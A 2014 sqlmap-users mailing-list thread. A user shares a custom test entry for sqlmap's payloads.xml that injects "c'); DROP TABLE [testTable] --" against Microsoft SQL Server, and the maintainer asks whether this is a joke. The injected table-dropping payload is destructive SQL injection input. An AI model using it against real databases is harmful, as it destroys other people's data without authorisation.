Re: [sqlmap-users] new test
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2014-01-21 13:22:27
|
So you made a "DROP TABLE" payload :)) I am not sure if this is a joke or for real?! Kind regards, Miroslav Stampar On Tue, Jan 21, 2014 at 10:24 AM, l.g. <ibo...@go...> wrote: > <l.g> writes: > > > > > hi! In payloads.xml I substituted this snippet: > > > > - <!-- End of AGAINST boolean full-text search boundaries > > --> > > - <!-- Boolean-based blind tests - WHERE/HAVING clause > > --> > > - <test> > > - <test> > > <title>drop table attack</title> > > <stype>2</stype> > > <level>1</level> > > <risk>5</risk> > > <clause>1</clause> > > <where>1</where> > > <vector>c'); DROP TABLE [testTable] --</vector> > > - <request> > > <payload>c'); DROP TABLE [testTable] --</payload> > > <comment>--</comment> > > </request> > > - <response> > > <grep>object</grep> > > </response> > > - <details> > > <dbms>Microsoft SQL Server</dbms> > > </details> > > </test> > > - <test> > > <title>AND boolean-based blind - WHERE or HAVING clause</title> > > <stype>1</stype> > > <level>1</level> > > <risk>1</risk> > > <clause>1</clause> > > <where>1</where> > > <vector>AND [INFERENCE]</vector> > > - <request> > > <payload>AND [RANDNUM]=[RANDNUM]</payload> > > </request> > > - <response> > > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> > > </response> > > </test> > > > > with this: > > > > - <!-- End of AGAINST boolean full-text search boundaries > > --> > > - <!-- Boolean-based blind tests - WHERE/HAVING clause > > --> > > - <test> > > - <test> > > <title>AND boolean-based blind - WHERE or HAVING clause</title> > > <stype>1</stype> > > <level>1</level> > > <risk>1</risk> > > <clause>1</clause> > > <where>1</where> > > <vector>AND [INFERENCE]</vector> > > - <request> > > <payload>AND [RANDNUM]=[RANDNUM]</payload> > > </request> > > - <response> > > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> > > </response> > > </test> > > > > but it doesn't work.. > > thank you > > > > > -------------------------------------------------------------------------- > ---- > > CenturyLink Cloud: The Leader in Enterprise Cloud Services. > > Learn Why More Businesses Are Choosing CenturyLink Cloud For > > Critical Workloads, Development Environments & Everything In Between. > > Get a Quote or Start a Free Trial Today. > > http://pubads.g.doubleclick.net/gampad/clk? > id=119420431&iu=/4140/ostg.clktrk > > > Sorry! I inverted the snippets in the previous post.. > > this is what I added to std xml: > > - <test> > <title>drop table attack</title> > <stype>2</stype> > <level>1</level> > <risk>5</risk> > <clause>1</clause> > <where>1</where> > <vector>c'); DROP TABLE [testTable] --</vector> > - <request> > <payload>c'); DROP TABLE [testTable] --</payload> > <comment>--</comment> > </request> > - <response> > <grep>object</grep> > </response> > - <details> > <dbms>Microsoft SQL Server</dbms> > </details> > </test> > > > > > > ------------------------------------------------------------------------------ > CenturyLink Cloud: The Leader in Enterprise Cloud Services. > Learn Why More Businesses Are Choosing CenturyLink Cloud For > Critical Workloads, Development Environments & Everything In Between. > Get a Quote or Start a Free Trial Today. > > http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |